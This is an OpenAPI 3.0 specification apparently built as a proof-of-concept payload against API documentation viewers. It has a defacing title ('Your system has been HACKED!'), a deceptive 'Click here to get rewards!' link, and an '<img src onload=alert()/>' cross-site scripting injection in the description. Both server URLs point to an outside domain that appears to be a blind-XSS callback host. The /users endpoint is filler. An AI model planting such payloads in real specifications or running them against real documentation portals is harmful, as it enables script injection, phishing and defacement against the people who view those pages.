openapi: 3.0.0
info:
  title: Your system has been HACKED!
  description: Optional multiline ![down](https://upload.wikimedia.org/wikipedia/commons/b/bb/Anonymous.jpg) or single-line description in [Click here to get rewards!](https://nasa.gov) or HTML.<img src onload=alert()/>
  version: 0.1.9

servers:
  - url: https://paktiko.bxss.in
    description: Optional server description, e.g. Main (production) server
  - url: https://paktiko.bxss.in
    description: Optional server description, e.g. Internal staging server for testing
    
paths:
  /users:
    get:
      summary: Returns a list of users.
      description: Optional extended description in CommonMark or HTML.
      responses:
        "200": # status code
          description: A JSON array of user names
          content:
            application/json:
              schema:
                type: array
                items:
                  type: string
